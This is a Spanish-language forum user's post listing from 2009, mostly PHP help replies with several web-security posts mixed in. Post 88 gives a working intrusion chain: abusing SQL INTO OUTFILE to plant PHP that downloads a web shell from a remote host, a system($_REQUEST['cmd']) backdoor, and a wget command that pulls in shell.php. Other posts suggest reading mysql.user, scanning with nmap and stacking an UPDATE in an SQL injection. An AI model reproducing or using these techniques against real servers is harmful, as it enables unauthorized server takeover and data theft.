últimos mensajes de: OzX

Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 [9] 10 11 12 13 14 15

81	Seguridad Informática / Nivel Web / Re: Un buen uso de INTO OUTFILE	en: 8 Marzo 2009, 20:15 pm
Citar tambien existen algunos server sin consola Como?

82	Programación / PHP / Re: error en el acceso a la propiedad	en: 8 Marzo 2009, 19:32 pm
Citar of the object you are trying to operate on was loaded _before_ unserialize() Iniciaste la Clase? new Class.. etc?

83	Programación / PHP / Re: Ayuda Code PHP	en: 8 Marzo 2009, 19:30 pm
jejeje pues creo que el compañero quiere contar caracteres y no Palabras. con substr, tienes todo solucionado. Saludos¡

84	Programación / PHP / Re: Obtener el codigo fuente de otra web con php ???	en: 8 Marzo 2009, 19:29 pm
La Forma msa Facil Código file_get_contents("url); Pero puede Ocupar, Curl, Fopen, socket_create. Luego obtienes el codigo fuente y con regexp, vas obtiendo ue codigo que tu quieras¡ saludos¡

Programación / PHP / Re: boton isset

en: 8 Marzo 2009, 19:18 pm

Cita de: eLank0 en 8 Marzo 2009, 14:08 pm

Con $PHP_SELF te sale en la misma página si es lo que quieres...

S2

Cuidado Con PHP_SELF ¡¡¡¡
http://www.nbsp.es/2007/07/18/php_self-%C2%A1peligro-a-la-vista/

Mejor ¡

Código

 $_SERVER['SCRIPT_NAME'];

;

EJEMPLO;

Código

<html>
<head>
<title>EJEMPLO</title>
</head>
<body>
<FORM ACTION="<? $_SERVER['SCRIPT_NAME']; ?>" METHOD="POST">
NOMBRE : <INPUT TYPE="text" NAME="nombre"><BR>
<INPUT TYPE="submit" VALUE="Enviar">
</FORM>
<?
$valor_nombre = htmlentities($_POST['nombre'],ENT_QUOTES);
if (isset($valor_nombre) && !empty($valor_nombre)){
echo $valor_nombre."<br>";
}else{
echo "SIN VALOR<br>";
}
?>
</body>
</html>

Espero que te Sirva¡
Saludos¡

86	Programación / PHP / Re: boton isset	en: 8 Marzo 2009, 08:29 am
if (isset ($var) && !empty($var)){ procesamos... }else{ errorr.. } Isset: Verifica que Esta Definida. !empty = verificamos que NO (!), este vacia. Saludos¡

87	Programación / PHP / Re: Ayuda Code PHP	en: 8 Marzo 2009, 08:22 am
Perdon si Interprete Mal la Idea XD¡ Pero por lo que entendi. No sale Mejor así? Código: <? $cadena = "Yo me Llamo Oz, y Tengo 2 Perros y 4 Gatos , Soy Chileno y Algun Dia GAnaremos el Mundial"; $Solo_50 = substr($cadena,0,50); ?> y Si quieres Contar Palabra http://cl2.php.net/manual/es/function.str-word-count.php Saludos¡

88	Seguridad Informática / Nivel Web / Re: Un buen uso de INTO OUTFILE	en: 6 Marzo 2009, 02:48 am
hi brota¡ Into Outfile. siempre sirve. cuando tienes magic quotes off, privilegios en el usuario , y el document root, y una carpeta con permisos. Con esas 4 cosas, tienes Ya Seguro el Ingreso a un Servidor. Y en este Post: http://foro.undersecurity.net/read.php?15,772 E Posteado varias Formas de Obtener Privilegios Mediante esta tecnica. Por ej En el Source a Insertar. Ingresar. Código: <? file_put_contents('shell.php',file_get_contents('http://www.ruta.com/shell.txt'));?> Tambien Se Puede pasar a Hexa SQL para no tener dramas con las " " En el Caso que no Tenga file_get_conetents, habilitado se puede hacer lo siguiente Código: <? system($_REQUEST['cmd']); ?> y Luego con Wget Código: wget -c --output-document=shell.php www.script.com/shell.txt Asi Kedaria Código: http://www.pagina.com/file/c.php?cmd=wget -c --output-document=shell.php www.script.com/shell.txt Y Vuala ¡ Saludos¡

89	Seguridad Informática / Nivel Web / Re: SQL injection.	en: 27 Febrero 2009, 17:44 pm
el load file es con '' load_file(''); o con hexsql. Prueba ingresando a mysql.user, para luego volver a logearte en el phpmyadmin, asi tendras algun privilegio de algo. o remotamente por si tiene mysql remoto nmap -sSV -P0 <ip> -p 3306 Saludos¡

90	Seguridad Informática / Nivel Web / Re: Inyeccion SQL (mysql) UPDATE dentro de un SELECT	en: 27 Febrero 2009, 17:40 pm
Ejemplo de Como Seria. MSSQL (Lo digo por el ; XD¡) Código SELECT email, passwd, login_id, full_name FROM members WHERE email = 'x'; UPDATE members SET email = 'steve@unixwiz.net' WHERE email = 'bob@example.com'; http://www.unixwiz.net/techtips/sql-injection.html Saludos¡

Páginas: 1 2 3 4 5 6 7 8 [9] 10 11 12 13 14 15